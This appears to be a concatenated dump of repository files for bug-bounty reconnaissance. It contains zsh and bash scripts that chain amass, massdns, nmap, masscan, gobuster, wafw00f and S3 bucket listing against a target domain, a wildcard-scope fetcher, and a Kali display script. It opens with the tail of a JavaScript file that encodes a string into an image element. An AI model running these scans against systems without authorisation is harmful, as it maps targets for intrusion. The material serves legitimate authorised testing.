porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\ Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\ Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\ Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\ Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\ Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\ Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\ Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\ Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\ Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\ Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\ Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\ Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\ Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\ Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\ Vestibulum tincidunt diam vel diam semper posuere. Nulla facilisi. Curabitur a facilisis lorem, eu porta leo. Sed pharetra eros et malesuada mattis. Donec tincidunt elementum mauris quis commodo. Donec nec vulputate nulla. Nunc luctus orci lacinia nunc sodales, vitae cursus quam tempor. Cras ullamcorper ullamcorper urna vitae pulvinar. Curabitur ac pretium felis. Vivamus vel scelerisque nisi. Pellentesque lacinia consequat nibh, vitae rhoncus tellus faucibus eget. Ut pulvinar est non tellus tristique sodales. Aenean eget velit non turpis tristique pretium id eu dolor. Nulla sed eros quis urna facilisis scelerisque. Nam orci neque, finibus eget odio et, elementum finibus erat.*/"; img.src = encode(stringenc), b.innerHTML = "", b.appendChild(img) })(); ================================================ FILE: scripts/recon.zsh ================================================ #!/usr/bin/env zsh #continue on errors set +e autoload colors; colors __info() echo "$fg[blue][*] $@ $reset_color" __ok() echo "$fg[green] [+] $@ $reset_color" __warn() echo "$fg[yellow][>] $@ $reset_color" __err() echo "$fg[red][!] $@ $reset_color" ############################################################# # Recon ############################################################# [[ -z $1 ]] && __err "Missing argument.\nUsage: zsh $0 " && exit [[ -z $2 ]] && __err "Missing argument.\nUsage: zsh $0 " && exit [[ -z $3 ]] && __err "Missing argument.\nUsage: zsh $0 " && exit export DOMAIN=$1 export ORG=$2 export DIR=$3 export UA="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" export F_ASN="${DIR}/asn.txt" export F_CIDR="${DIR}/cidr.txt" export F_SUBS="${DIR}/subs.txt" export F_SUBS_RES="${DIR}/subs.resolved.txt" export F_HOSTS="${DIR}/hostnames.txt" export F_HOSTS_IP="${DIR}/hostips.txt" export F_WEB="${DIR}/urls.txt" export PORTS="21,22,25,80,443,135-139,445,3389,3306,1433,389,636,88,111,2049,1521,110,143,161,6379,5900,2222,4443,8000,8888,8080,9200" ############################################################# # Startup ############################################################# __info "Recon.zsh running... " __info "Domain: ${DOMAIN} Org: ${ORG}" __info "Using current directory for output: ${DIR}" ############################################################# # Steps ############################################################# org() { __ok "metagoofil'ing files" mkdir -p ${DIR}/files metagoofil -u "${UA}" -d ${DOMAIN} -t pdf,doc,docx,ppt,pptx,xls,xlsx -w -l 100 -n 50 -o ${DIR}/files > /dev/null 2>&1 & } network() { __ok "Amass'ing ASNs" amass intel -org "${ORG}" | cut -d, -f1 > ${F_ASN} __ok "BGPview'ing CIDRs" for asn in $(cat ${F_ASN}) do if [[ ! -z ${asn} ]] then curl -s https://api.bgpview.io/asn/${asn}/prefixes | jq -r '.data | .ipv4_prefixes | .[].prefix' > ${F_CIDR} fi done __ok "dnsrecon'ing PTRs" network_dnsrecon #__ok "masscan'ing CIDRs" #network_masscan } network_dnsrecon() { mkdir -p ${DIR}/ptr for cidr in $(cat ${F_CIDR}) do if [[ ! -z ${cidr} ]] then local net=$(echo ${cidr} | cut -d/ -f1) dnsrecon -d ${DOMAIN} -r ${cidr} -n 1.1.1.1 -c ${DIR}/ptr/ptr.${net}.csv > /dev/null 2>&1 fi done } network_masscan() { mkdir -p ${DIR}/net for cidr in $(cat ${F_CIDR}) do if [[ ! -z ${cidr} ]] then local net=$(echo ${cidr} | cut -d/ -f1) sudo masscan ${cidr} -p${PORTS} -oL ${DIR}/net/masscan.${net}.txt > /dev/null 2>&1 fi done } domains() { echo "${DOMAIN}" > ${DIR}/domains.txt __ok "Subfinder'ing " subfinder -d ${DOMAIN} -nW -silent >> ${F_SUBS} > /dev/null 2>&1 __ok "crt.sh'ing " curl -s 'https://crt.sh/?q=%.$DOMAIN' | grep -i "${DOMAIN}" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v " " | sort -u >> ${F_SUBS} > /dev/null 2>&1 __ok "waybackurls'ing... " echo ${DOMAIN} | waybackurls | cut -d "/" -f3 | sort -u | grep -v ":80" >> ${F_SUBS} > /dev/null 2>&1 __ok "sorting results " cat ${F_SUBS} | sort -u -o ${F_SUBS} > /dev/null 2>&1 } lookups() { __ok "massdns'ing domains" /opt/recon/massdns/bin/massdns -r /opt/recon/massdns/lists/resolvers.txt -t A -o S ${F_SUBS} -w ${F_SUBS_RES} > /dev/null 2>&1 __ok "extracting resolved hostnames" sed 's/A.*//' ${F_SUBS_RES} | sed 's/CN.*//' | sed 's/\..$//' | sort -u >> ${F_HOSTS} > /dev/null 2>&1 __ok "extracting resolved IP addresses" grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' ${F_SUBS_RES} | sort -u | sort -V -o ${F_HOSTS_IP} > /dev/null 2>&1 } scans() { __ok "scanning host IP's" mkdir -p ${DIR}/hosts for h in $(cat ${F_HOSTS_IP}) do __ok "...scanning ${h}" mkdir -p ${DIR}/hosts/${h} nmap -sT -p ${PORTS} -T4 --open ${h} -oA ${DIR}/hosts/${h}/scan > /dev/null 2>&1 done } web() { __ok "httprobing resolved hosts" cat ${F_HOSTS} | httprobe -t 3000 -s -p https:443 | sed 's/....$//' >> ${F_WEB} > /dev/null 2>&1 mkdir -p ${DIR}/web for url in $(cat ${F_WEB}) do __ok "...enumerating ${url} ... " local host=$(echo ${url} | cut -d/ -f3) local hdir=${DIR}/web/${host} mkdir -p ${hdir} __ok "Getting IP address" host ${host} > ${hdir}/ip.txt > /dev/null 2>&1 __ok "Curling robots.txt" curl -s -L ${url}/robots.txt -o ${hdir}/robots.txt > /dev/null 2>&1 __ok "Whatwebbing" whatweb ${url} -a 1 > ${hdir}/whatweb.txt > /dev/null 2>&1 __ok "Wafw00fing" wafw00f ${url} > ${hdir}/waf.txt > /dev/null 2>&1 __ok "Gobustering" gobuster dir -q -z -u ${url} -w /usr/share/seclists/Discovery/Web-Content/common.txt -t10 -k -o ${hdir}/gobuster.txt > /dev/null 2>&1 __ok "S3 Bucketing" aws s3 ls s3://${host} > s3.txt > /dev/null 2>&1 done } ############################################################# # Workflow ############################################################# __info "Searching for Org OSINT... " org __info "Mapping Network... " network __info "Collecting sub-domains..." domains __info "Resolving sub-domains... " lookups __info "Scanning IP addresses..." scans __info "Probing web servers..." web __info "Checking job completion..." wait $(jobs -p) __info "Recon completed" echo " " ================================================ FILE: scripts/webrecon.zsh ================================================ red=`tput setaf 1` green=`tput setaf 2` yellow=`tput setaf 3` reset=`tput sgr0` echo -e "[*] webrecon.zsh " echo -e "[*] source: $1" echo -e " " for url in $(cat $1);do echo -e "[*] Enumerating ${url}" ############################################################ # Make directory ############################################################ host=$(echo $url | cut -d "/" -f3) echo -e "${green} [+] Making directory ${host} ${reset}" mkdir -p ${host} ############################################################ # Host ############################################################ echo -e "${green} [+] Getting IP address... ${reset}" host ${host} | tee ${host}/ip.txt > /dev/null ############################################################ # Robots ############################################################ echo -e "${green} [+] Curling... robots.txt ${reset}" curl -s -L ${url}/robots.txt -o ${host}/robots.txt ############################################################ # Ports ############################################################ echo -e "${green} [+] Nmapping... ${reset}" nmap -sT --top-ports 100 --open ${host} -oA ${host}/ports > /dev/null ############################################################ # Whatweb ############################################################ echo -e "${green} [+] Whatwebbing... ${reset}" whatweb ${url} -a 1 > ${host}/whatweb.txt 2> /dev/null ############################################################ # Wafw00f ############################################################ echo -e "${green} [+] Wafw00fing... ${reset}" wafw00f ${url} > ${host}/waf.txt 2> /dev/null ############################################################ # Gobuster ############################################################ echo -e "${green} [+] Gobustering... ${reset}" gobuster dir -q -z -u ${url} -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -k -o ${host}/gobuster-dirs.txt 2> /dev/null ############################################################ # Eyewitness ############################################################ #echo -e "${green} [+] Screenshotting... ${reset}" #eyewitness --web --single ${url} -d ./${host}/screens --no-prompt &> /dev/null ############################################################ # AWS ############################################################ echo -e "${green} [+] S3 Bucketing... ${reset}" aws s3 ls s3://${host} > s3.txt 2> /dev/null echo -e " " done echo -e " " echo -e "[*] Done" ================================================ FILE: scripts/wildcards.py ================================================ #!/usr/bin/env python3 # coding=utf-8 # ******************************************************************* # *** Wildcards *** # * Description: # A script that does recon on public bug bounty wildcard domains. # * Version: # v0.1 # * Homepage: # https://github.com/stevemcilwain/wildcards # * Author: # Steve Mcilwain # ******************************************************************* # Modules import sys import requests import os # Configuration WILDCARDS_URL = "https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/wildcards.txt" WILDCARDS_FILE = "wildcards.txt" # Colors def print_red(skk): print("\033[91m{}\033[00m" .format(skk)) def print_cyan(skk): print("\033[96m{}\033[00m" .format(skk)) def print_yellow(skk): print("\033[93m{}\033[00m" .format(skk)) # Workflow def download_file_from_url(url, file): result = False r = requests.get(url, allow_redirects=True) if r.status_code == 200: with open(file, "wb") as f: f.write(r.content) result = True else: result = False return (result, r.status_code) def read_domains_from_file(file): result = False domains = set() with open(file, "r") as f: for line in f: if line.startswith("*."): domain=line[2:].rstrip("\n") domains.add(domain) result = True return (result, domains) def main(): print(" ") print_cyan("Wildcards") print(" ") print_cyan("[INFO] Roundin 'em up!") results = download_file_from_url(WILDCARDS_URL, WILDCARDS_FILE) if not results[0]: sys.exit("[ERR] Failed to download file: {}".format(results[1])) print("[INFO] Wrangled into: {}".format(WILDCARDS_FILE)) results = read_domains_from_file(WILDCARDS_FILE) if not results[0]: sys.exit("[ERR] Failed to download file") #for domain in domains: #print("Domain: " + domain) if (__name__ == "__main__"): try: main() except KeyboardInterrupt: print('\nKeyboardInterrupt Detected.') print('\nExiting...') exit(0) ================================================ FILE: scripts/wildcards.sh ================================================ #!/usr/bin/env bash ############################################################# # wildcards.sh # # This script is intended to run on a VPS as a cron job. # Run it nightly and it will any newly discovered sub domains # from the list of root domains that use wildcard scope. ############################################################# # Set an environment variable in your .bashrc for your Slack webhook # export __WILDCARDS_SLACK="https://hooks.slack.com/services/" # Setup cron to run at a certain hour every night, example below at 2 am # crontab -e # m h dom mon dow command # 0 2 * * * /bin/bash /path/to/wildcards.sh DOMAIN=$1 SLACK=$2 if [[ -z "$DOMAIN" ]] then echo "[x] Missing domain" exit 1 fi echo $(date) >> log.txt echo "$DOMAIN" >> log.txt echo "$SLACK" >> log.txt curl -X POST --data-urlencode payload="{\"text\": \"Wildcards starting for $DOMAIN \"}" $SLACK amass enum -active -ip -d $DOMAIN DIFF=$(amass track -d $DOMAIN -last 2 | grep Found | awk '{print $2}') echo "Diff: $DIFF" >> log.txt if [[ ! -z "$DIFF" ]] then curl -X POST --data-urlencode payload="{\"text\": \"$DIFF\"}" $SLACK fi curl -X POST --data-urlencode payload="{\"text\": \"Wildcards completed for $DOMAIN \"}" $SLACK ================================================ FILE: system/hidpi.sh ================================================ #!/usr/bin/env bash xfconf-query -c xfwm4 -p /general/theme -s Kali-Dark-xHiDPI xfconf-query -c xsettings -p /Gdk/WindowScalingFactor -n -t 'int' -s 2 cat <<- EOF >> ~/.xsessionrc export QT_SCALE_FACTOR=2 export XCURSOR_SIZE=48 export GDK_SCALE=2 EOF